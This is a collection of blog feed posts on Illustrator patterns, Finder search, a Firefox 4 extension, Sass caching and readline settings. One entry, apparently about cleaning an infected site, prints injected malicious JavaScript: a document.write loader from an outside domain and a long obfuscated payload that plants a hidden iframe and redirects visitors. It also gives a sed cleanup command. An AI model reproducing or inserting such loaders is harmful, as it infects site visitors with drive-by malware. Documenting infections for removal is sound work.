			<content:encoded><![CDATA[<p>I wonder how difficult has been to use a <strong>raster image</strong> (as .jpg and .png) <strong>as a pattern</strong> to fill shapes in <strong>Abobe illustrator</strong>.</p>
<p>Obviously I googled to find the answer but the web didn&#8217;t return the results I was looking for. Just tutorials on vector patterns, not on rasters.</p>
<p>It&#8217;s a long time I don&#8217;t use these kind of software as I work in web development or dtp with Photoshop and Indesign and I nerver loved AI too much. But I defenetly agree with whom says that it&#8217;s <strong>unusable</strong> and less intuitive for such basic things. I used to build vector graphics with <em>Corel Xara</em> that was so simple as amazing in &#8217;90s&#8230; and was so easy to do a pattern with bitmap&#8230;</p>
<p>Well, 3 simple steps (when you know them!):</p>
<ol>
<li>drag your image to AI</li>
<li>select the image and click on &#8220;embed&#8221; <strong>&lt;- this is the trick</strong></li>
<li>go to edit menu and click on &#8220;define pattern&#8221;, named it and click on &#8220;add to swatches&#8221;</li>
<li>now you can create our custom shape and drag your raster swatch on it. It will be filled with your btmap. Take care of resolution &#8217;cause you cannot resize or distorce it (or I didn&#8217;t found how)</li>
</ol>
<p>Hope this can help</p>
<p>Thanks to <a href="https://twitter.com/#!/teamcantiere" target="_blank">Luca Bonfiglio from @teamcantiere</a> for his help on this issue!</p>

<p>Using &#8220;find&#8221; command on a shell is the hard (and better!) way, but sometimes you can&#8217;t. I&#8217;ve got to find an exact kind of file extension into my Time Machine backup.</p>
<p>I wanted all my .AI files. So, I&#8217;ve tried to find &#8220;.ai&#8221; as document name in the search bar of the finder. Sometime it could be enough, when the extention has no variants. But in this case I&#8217;ve got the problem that Osx is plenty of .AIF audio file and those are most of the results of my search.</p>
<p>As I said, it has been easy: &#8220;.ai&#8221; -aif</p>
<p>That&#8217;s all, hope this can help others.</p>

			<content:encoded><![CDATA[<p><strong><a href="http://www.mozilla.com/it/firefox/" target="_blank">Firefox 4</a></strong> has been finally released fews days ago and I&#8217;m so happy about that. It is much faster and fluid so my suggestion is to <a href="http://www.mozilla.com/it/firefox/" target="_blank">update</a> your version as soon as you can!</p>
<p>As always, when a new verison comes out, there&#8217;s the same annoing problem: extensions compatibility. I&#8217;ve been surprised to see that my favourites extensions were almost availables, with the execption of one of the most important for me: the <strong>delicious</strong> bookmarks saver.</p>
<p><span id="more-420"></span>Thanks to <em>bart (</em><a href="http://www.gufp.nl/" target="_blank">http://www.gufp.nl/</a><em>)</em>, who hacked the ext, I&#8217;ve got back this extension and I do wish to share this great news!!!</p>
<p>So, if you have the same problem, go ahead with the following steps:</p>
<ol>
<li><strong>Download</strong> the extension from <a href="http://www.gufp.nl/deliciousfirefox/" target="_blank">http://www.gufp.nl/deliciousfirefox/</a></li>
<li>Press <strong>CTRL + SHIFT + A</strong> in your Firefox 4 browser</li>
<li><strong>Drag</strong> the file you downloaded into firefox and it will install the extension as always.</li>
<li><strong>Enjoy</strong> your delicious!</li>
</ol>
<p>This is <a href="http://www.delicious.com/termiteo" target="_blank"><strong>my delicious</strong> bookmarks page</a>. Enjoy it!</p>
<p>&nbsp;</p>
<h2>Please, I beg you!</h2>
<p>(in these days, Internet Explorer 9 and Chrome 11 have been released too); Please, I beg you, avoid to use Internet Explorer 6 / 7 / 8 in favour of a modern browser&#8230; you will only have an advantage of it and will help lots of webdesigners!</p>

			<content:encoded><![CDATA[<p>Useing sass from a while<a href="http://sass-lang.com/" target="_blank"> (haml ruby gem)</a>, I&#8217;ve got a problem with it and could not find the solution on the web. After tons of swearwords, I did discover the solution!</p>
<h2><span id="more-399"></span>The problem</h2>
<p>I like to use the watch to an entire folder; this allow me to edit any scss file and the observer write the final css file with a compact output. his is the string:</p>
<pre>sass -t compact --watch [the/scss/folder]:[the/css/folder]</pre>
<p>At a certain point it&#8217;s happend that the watcher has stoped to &#8220;feel&#8221; the change written on my editor. The only way was to stop the service and start it again. I&#8217;ve finally understood that was a cache problem. Sass write an hidden .sass cache folder that cause the problem after a while I work at the same project.</p>
<h2>The solution</h2>
<p>Run the sass command without cache adding a -C parameter:</p>
<pre>sass -C -t compact --watch [the/scss/folder]:[the/css/folder]</pre>
<p>Yes, so easy! this is the right twitter in these cases <a href="http://twitter.com/#!/angrydeveloper" target="_blank">http://twitter.com/#!/angrydeveloper</a></p>

<pre>document.write('&lt;sc'+'ript type="text/javascript" src="http://nuttypiano.com/Y2K.js"&gt;&lt;/scri'+'pt&gt;')
</pre>
<p>Come rimuoverlo?!</p>
<pre>find -name \*.js -exec sed --in-place=bak '/nuttypiano/d' {} \;
</pre>

<pre>&lt;script language=javascript&gt;document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')&lt;/script&gt;</pre>

<p># set show-all-if-ambiguous on</p>
<p># do not bell on tab-completion<br />set bell-style none</p>
<p>set meta-flag on<br />set input-meta on<br />set convert-meta off<br />set output-meta on</p>
<p># show file types while completing<br />set visible-stats on</p>
<p># Completed names which are symbolic links to<br /># directories have a slash appended.<br />set mark-symlinked-directories on</p>
<p># Only show &#8216;show all nn items&#8217; for > 1000<br />set completion-query-items 1000</p>
<p>$if mode=emacs</p>
<p># for linux console and RH/Debian xterm<br />&#8220;\e[1~": beginning-of-line<br />"\e[4~": end-of-line<br />"\e[5~": beginning-of-history<br />"\e[6~": end-of-history<br />"\e[3~": delete-char<br />"\e[2~": quoted-insert<br />"\e[5C": forward-word<br />"\e[5D": backward-word<br />"\e[1;5C": forward-word<br />"\e[1;5D": backward-word<br />"\e[5~": history-search-backward<br />"\e[6~": history-search-forward</p>
<p># for rxvt<br />"\e[8~": end-of-line</p>
<p># for non RH/Debian xterm, can't hurt for RH/DEbian xterm<br />"\eOH": beginning-of-line<br />"\eOF": end-of-line</p>
<p># for freebsd console<br />"\e[H": beginning-of-line<br />"\e[F": end-of-line</p>
<p>$endif</p>
<p># [Up] and [Down] do incremental history search<br />&#8220;\e[A": history-search-backward<br />"\e[B": history-search-forward</p>
<p># Previous stops [Left] and [Right] working: reinstate<br />&#8220;\e[C&#8221;: forward-char<br />&#8220;\e[D&#8221;: backward-char</p>
